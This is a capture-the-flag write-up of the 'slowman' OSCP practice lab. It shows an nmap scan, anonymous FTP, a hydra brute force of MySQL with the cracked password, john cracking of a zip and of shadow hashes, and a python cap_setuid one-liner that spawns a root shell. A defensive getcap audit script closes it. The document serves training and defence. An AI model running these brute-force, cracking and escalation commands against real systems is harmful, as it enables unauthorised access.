【OSCP】slowman

admin, 2024-05-11 11:42:58, 7 views, 3,445 characters, about 11 minutes to read

Lab introduction

slowman

easy

FTP exploitation, MySQL brute force, working in the MySQL database, cracking a zip password, cracking shadow hashes, privilege escalation via Linux capabilities

Information gathering

Host discovery

Port scanning

└─# nmap -sV -A -p- -T4 192.168.31.119
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-11 00:55 EST
Nmap scan report for 192.168.31.119
Host is up (0.00083s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.31.181
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 02:d6:5e:01:45:5b:8d:2d:f9:cb:0b:df:45:67:04:22 (ECDSA)
|_ 256 f9:ce:4a:75:07:d0:05:1d:fb:a7:a7:69:39:1b:08:10 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Fastgym
3306/tcp open mysql MySQL 8.0.35-0ubuntu0.22.04.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.35_Auto_Generated_Server_Certificate
| Not valid before: 2023-11-22T19:44:52
|_Not valid after: 2033-11-19T19:44:52
| mysql-info:
| Protocol: 10
| Version: 8.0.35-0ubuntu0.22.04.1
| Thread ID: 10
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, SupportsTransactions, Speaks41ProtocolNew, LongPassword, IgnoreSigpipes, FoundRows, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsCompression, ConnectWithDatabase, InteractiveClient, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: q"^<5|~[y8x19pbWx1Ex12kx01 x19
|_ Auth Plugin Name: caching_sha2_password
MAC Address: 08:00:27:A3:1C:A6 (Oracle VirtualBox virtual NIC)
Device type: general purpose|storage-misc|WAP|media device
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X|3.X (98%), HP embedded (89%), Ubiquiti embedded (89%), Infomir embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.32 cpe:/h:ubnt:airmax_nanostation cpe:/h:infomir:mag-250
Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (94%), Linux 5.0 - 5.5 (93%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Linux 5.0 (91%), Linux 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.83 ms 192.168.31.119

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 213.00 seconds

Directory scanning

Gaining access

The FTP service allows anonymous login. After retrieving the file allowwedusermysql.txt from it, the account and password were brute forced.

Brute force MySQL to obtain the account and password

hydra -l trainerjeff -P /usr/share/wordlists/rockyou.txt mysql://192.168.31.119

mysql -h 192.168.31.119 -u trainerjeff -psoccer1

Once inside the database, retrieve the account, the password and the access path.

After logging in, a compressed archive is obtained, but it is password protected.

Cracking the zip password

zip2john credentials.zip > credentialszip
john credentialszip --wordlist=/usr/share/wordlists/rockyou.txt

After extracting the archive, an account and a password hash are obtained.

Crack the hash to recover the password

john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt

Privilege escalation

Privilege escalation here uses Linux file capabilities. The following command lists every binary on the system that carries a capability set, which is where the usable program is found:

getcap / -r 2>/dev/null
Reference for the technique: https://www.freebuf.com/articles/system/251182.html

We escalate to root through python, whose binary carries the capability found above:

python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
script /dev/null -c bash
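As an added example that is not part of the original writeup: a small POSIX sh audit function that reads getcap output (the same enumeration step shown above) and flags the capability assignments a defender should remove, marking interpreters such as the python3.10 binary that carries cap_setuid in this lab. The RISKY_CAPS list, the audit_caps name and the INTERPRETER/binary tags are my own choices.

```shell
# Audit getcap output for file capabilities that hand an unprivileged user
# root-equivalent power. Both libcap output styles are handled:
#   /usr/bin/python3.10 cap_setuid=ep        (libcap >= 2.41)
#   /usr/bin/python3.10 = cap_setuid+ep      (older libcap)
# Usage on a live host:  getcap -r / 2>/dev/null | audit_caps

# Capabilities that on their own lead to root or to reading/writing any file.
# (Assumed list for this example; extend it to match local policy.)
RISKY_CAPS='cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner'

# Reads getcap-style lines on stdin and prints "tag<TAB>path<TAB>caps" for
# every entry carrying a risky capability. Interpreters are tagged separately:
# cap_setuid on python/perl/ruby/node is a one-liner to a root shell, which is
# exactly what the python3.10 step above demonstrates.
audit_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}            # first field: the binary path
        caps=${line#"$path"}        # remainder of the line
        caps=${caps#" "}            # drop the separating space
        caps=${caps#"= "}           # drop the "= " of the old format
        if printf '%s\n' "$caps" | grep -Eq "($RISKY_CAPS)"; then
            case "$path" in
                *python*|*perl*|*ruby*|*node*) tag='INTERPRETER' ;;
                *) tag='binary' ;;
            esac
            printf '%s\t%s\t%s\n' "$tag" "$path" "$caps"
        fi
    done
}

# Remediation for a flagged file is to strip the capability set:
#   setcap -r /usr/bin/python3.10
# and, for interpreters, to ask why a capability was ever granted at all.
```

Entries such as cap_net_raw on ping are not reported, since they do not by themselves escalate privileges.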

End

Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】slowman

When reproducing this article, please keep its link (CN-SEC: thanks to the original author for their work): https://cn-sec.com/archives/2729380.html
